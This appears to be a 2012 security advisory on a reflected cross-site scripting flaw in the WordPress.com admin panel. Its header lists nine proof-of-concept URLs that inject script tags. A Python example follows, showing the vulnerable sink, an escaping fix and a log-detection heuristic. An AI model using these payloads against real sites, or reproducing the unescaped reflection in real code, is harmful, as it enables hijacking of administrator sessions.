The administrative panel for WordPress blogs hosted on WordPress.com suffers from a reflected cross-site scripting vulnerability.
87662fc54e7b6298ff08f7317f1a8410dcbb4c6454b35404b18429d6ada48103
###############################################################################################################
# Exploit Title: WordPress Blog ( hosted by WordPress.com ) - Admin Panel Reflected Cross-Site Scripting ( XSS )
# Script Page : http://wordpress.com
# Date: 10-01-2012
# Author : RandomStorm - http://www.randomstorm.com
# Avram Marius Gabriel (d3v1l)
# Tested on: Windows XP & Vista (IE9)
###############################################################################################################
# Cross-Site Scripting (XSS)
# POC:
# http://site.com//wp-admin/index.php?page=my-comments&e3771"><script>alert(1)</script>9198e439b5b=1
# http://site.com//wp-admin/paid-upgrades.php?id=04a60d"><script>alert(1)</script>8b5efd72d71
# http://site.com/wp-admin/index.php?page=my-comments&e3771"><script>alert(1)</script>9198e439b5b=1
# http://site.com/wp-admin/edit.php?7ea9d"><script>alert(1)</script>4179dee262d=1
# http://site.com/wp-admin/post-new.php?cape7739"><script>alert(1)</script>154225169bf#cap
# http://site.com/wp-admin/tools.php?36eae"><script>alert(1)</script>3ee8cbf0807=1
# http://site.com/wp-admin/post.php?post=28ce53"><script>alert(1)</script>7d542a3eb0c&action=edit
# http://site.com/wp-admin/widgets.php?1a6e1"><script>alert(1)</script>fca8623d09b=1
# http://site.com/wp-admin/import.php?b90df"><script>alert(1)</script>4f0256c6187=1
################################################################################################################
# No version: WordPress.com runs its own dedicated script, not a numbered release
# Works on Internet Explorer v9
################################################################################################################
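Every PoC above follows the same pattern: an extra query parameter whose *name* contains `"><script>...</script>` is reflected into the page without escaping, so the double quote terminates an attribute value and the rest is parsed as markup. The following Python is an added example (not code from the advisory and not WordPress.com's own code) that models that sink with a hypothetical `return_to` hidden field, shows the attribute-escaped fix, and includes a small log-side heuristic a defender can run over request URLs. The sample URL is constructed from the PoC shape in the advisory; the sink, field name and heuristic are assumptions.

```python
import html
from urllib.parse import urlsplit, unquote

# Constructed sample request, modelled on the PoC URLs in the advisory:
# the payload is carried in the *name* of an extra query parameter.
SAMPLE_URL = 'http://site.com/wp-admin/edit.php?7ea9d"><script>alert(1)</script>4179dee262d=1'
# Constructed benign request for comparison.
BENIGN_URL = 'http://site.com/wp-admin/edit.php?post_status=draft'


def raw_query(url):
    """Return the query string exactly as the browser sent it (no decoding)."""
    return urlsplit(url).query


def render_vulnerable(url):
    """Hypothetical admin page that reflects the raw query string into an
    HTML attribute (the 'return_to' field is an assumed sink, not WordPress's).
    This is the defect class the advisory reports: the " in the input closes
    value="..." early and everything after it is parsed as live markup."""
    return '<input type="hidden" name="return_to" value="?%s">' % raw_query(url)


def render_hardened(url):
    """Same page with the reflected value HTML-attribute escaped first.
    html.escape(quote=True) maps " to &quot; and < > to &lt; &gt;, so the
    attribute cannot be terminated by attacker-controlled input."""
    safe = html.escape(raw_query(url), quote=True)
    return '<input type="hidden" name="return_to" value="?%s">' % safe


def reflects_markup(rendered):
    """Response-side check for a tester or CI job: does the body contain the
    attribute-break sequence as markup rather than as escaped text?"""
    return '"><script>' in rendered


def suspicious_query(url):
    """Request-side heuristic for web/proxy logs: URL-decode the query and
    look for attribute-break or tag-open sequences. A constructed triage
    heuristic for hunting this pattern, not a complete WAF rule."""
    q = unquote(raw_query(url)).lower()
    return '"><' in q or '<script' in q


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(SAMPLE_URL))
    print("hardened:  ", render_hardened(SAMPLE_URL))
    print("flagged:   ", suspicious_query(SAMPLE_URL), suspicious_query(BENIGN_URL))
```

The vulnerable render emits `value="?7ea9d"><script>alert(1)</script>...` and the browser executes the script; the hardened render emits `&quot;&gt;&lt;script&gt;` inside the attribute and nothing executes. The decoding step in `suspicious_query` matters because the same payload is often logged percent-encoded (`%22%3E%3Cscript%3E`).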